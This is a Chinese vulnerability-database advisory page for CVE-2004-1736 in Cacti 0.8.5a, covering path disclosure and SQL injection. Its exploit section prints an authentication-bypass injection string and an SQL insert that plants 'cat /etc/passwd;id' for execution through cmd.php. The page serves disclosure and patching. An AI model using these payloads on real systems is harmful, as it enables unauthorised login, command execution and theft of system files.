CVE-2004-1736
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 23:00:10
NMCOS    

[原文]Cacti 0.8.5a allows remote attackers to gain sensitive information via an HTTP request to (1) auth.php, (2) auth_login.php, (3) auth_changepassword.php, and possibly other php files, which reveal the installation path in a PHP error message.


[CNNVD]RaXnet Cacti Auth_Login.PHP SQL漏洞(CNNVD-200412-546)

        Cacti 0.8.5a版本存在漏洞。远程攻击者借助(1)auth.php,(2)auth_login.php,(3)auth_changepassword.php,和其他可能的php文件的HTTP请求获取敏感信息,该漏洞在PHP出错消息中泄露了安装路径。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1736
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1736
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-546
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-August/025376.html
(UNKNOWN)  FULLDISC  20040816 SQL Injection in CACTI
http://marc.info/?l=bugtraq&m=109272483621038&w=2
(UNKNOWN)  BUGTRAQ  20040816 SQL Injection in CACTI
http://xforce.iss.net/xforce/xfdb/17014
(UNKNOWN)  XF  cacti-error-path-disclosure(17014)

- 漏洞信息

RaXnet Cacti Auth_Login.PHP SQL漏洞
中危 输入验证
2004-12-31 00:00:00 2006-08-28 00:00:00
远程  
        Cacti 0.8.5a版本存在漏洞。远程攻击者借助(1)auth.php,(2)auth_login.php,(3)auth_changepassword.php,和其他可能的php文件的HTTP请求获取敏感信息,该漏洞在PHP出错消息中泄露了安装路径。
        

- 公告与补丁

        It is reported that this vulnerability is addressed in the CVS release. This is not confirmed.
        Gentoo has released advisory GLSA 200408-21 dealing with this issue. Users are advised to upgrade to the latest available version of Cacti using the following sequence of commands:
        # emerge sync
        # emerge -pv ">=net-analyzer/cacti-0.8.5a-r1"
         # emerge ">=net-analyzer/cacti-0.8.5a-r1"
        Please see the referenced Gentoo advisory for more information.
        Gentoo has released an update to the above-mentioned advisory; the workaround section has been updated. Please see the referenced advisory for more information.
        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息

8990
Cacti auth.php Path Disclosure
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

Cacti contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious user sends a specially crafted URL or tries to access the auth.php script directly, which causes the server to display an error page which discloses path information resulting in a loss of confidentiality.

- 时间线

2004-08-18 Unknow
2004-08-18 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Raxnet has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

RaXnet Cacti Auth_Login.PHP SQL Injection Vulnerability
Input Validation Error 10960
Yes No
2004-08-16 12:00:00 2009-07-12 06:16:00
Discovery of this vulnerability is credited to Fernando Quintero <nando@altred.net>.

- 受影响的程序版本

Raxnet Cacti 0.8.5 a
Raxnet Cacti 0.8.5
Raxnet Cacti 0.8.4
Raxnet Cacti 0.8.3 a
Raxnet Cacti 0.8.3
Raxnet Cacti 0.8.2 a
Raxnet Cacti 0.8.2
Raxnet Cacti 0.8.1
Raxnet Cacti 0.8
Raxnet Cacti 0.6.8 a
Raxnet Cacti 0.6.8
Raxnet Cacti 0.6.7
+ Debian Linux 3.0
Raxnet Cacti 0.6.6
Raxnet Cacti 0.6.5
Raxnet Cacti 0.6.4
Raxnet Cacti 0.6.3
Raxnet Cacti 0.6.2
Raxnet Cacti 0.6.1
Raxnet Cacti 0.6
Raxnet Cacti 0.5
Gentoo Linux 1.4

- 漏洞讨论

RaXnet Cacti is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the auth_login.php script due to a failure of the application to properly sanitize user-supplied "username" URI parameter input before using it in an SQL query.

It is demonstrated that an attacker may exploit this vulnerability in order to bypass the authentication interface used by Cacti.

- 漏洞利用

The following examples are available:

username = admin' or '6'='6
password = password wished

insert into data_input_data_cache (local_data_id, host_id,
data_input_id, action, command, hostname, snmp_community,
snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout,
rrd_name, rrd_path, rrd_num, arg1, arg2, arg3)
values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some
script', '127.0.0.1', '', '1', '', '', '161', '500',
'hack', '/', '3', 'NULL', 'NULL', 'NULL');

Then points to http://www.example.com/cacti/cmd.php and the command will be
executed.

- 解决方案

It is reported that this vulnerability is addressed in the CVS release. This is not confirmed.

Gentoo has released advisory GLSA 200408-21 dealing with this issue. Users are advised to upgrade to the latest available version of Cacti using the following sequence of commands:

# emerge sync

# emerge -pv ">=net-analyzer/cacti-0.8.5a-r1"
# emerge ">=net-analyzer/cacti-0.8.5a-r1"

Please see the referenced Gentoo advisory for more information.

Gentoo has released an update to the above-mentioned advisory; the workaround section has been updated. Please see the referenced advisory for more information.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站